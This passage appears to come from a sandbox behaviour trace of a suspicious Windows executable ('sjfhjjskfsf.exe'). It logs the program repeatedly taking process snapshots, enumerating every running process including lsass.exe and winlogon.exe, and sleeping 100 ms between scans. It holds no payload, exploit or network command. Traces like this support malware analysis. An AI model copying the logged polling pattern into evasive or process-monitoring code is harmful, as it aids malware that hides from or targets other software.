lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.687] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.687] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.688] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0212.688] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.688] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.689] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.689] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.690] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.690] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.690] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.691] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.691] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0212.691] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.692] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.692] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.692] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.693] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.693] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0212.693] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0212.693] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.694] Process32NextW (in: hSnapshot=0x130, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0212.694] Sleep (dwMilliseconds=0x64) [0212.863] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x134 [0212.865] Process32FirstW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.865] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.865] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.866] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.866] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.866] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.867] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.867] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.867] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.868] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0212.868] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.868] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.869] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.869] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.869] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.869] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.870] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.870] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.870] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0212.871] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.871] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.871] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.872] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.872] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.872] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0212.873] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0212.873] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.873] Process32NextW (in: hSnapshot=0x134, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0212.874] Sleep (dwMilliseconds=0x64) [0212.981] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x138 [0212.982] Process32FirstW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.983] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.983] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.983] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.984] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.984] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.984] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.985] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.985] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.985] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0212.986] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.986] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.986] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.987] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.987] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.987] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.988] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.988] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.988] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0212.989] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.989] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.989] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.990] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.990] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.990] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0212.990] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0212.991] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.991] Process32NextW (in: hSnapshot=0x138, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0212.991] Sleep (dwMilliseconds=0x64) [0213.147] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x13c [0213.149] Process32FirstW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.149] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.149] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.150] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.150] Process32NextW (in: hSnapshot=0x13c, lppe=0x18ebc4 | out: 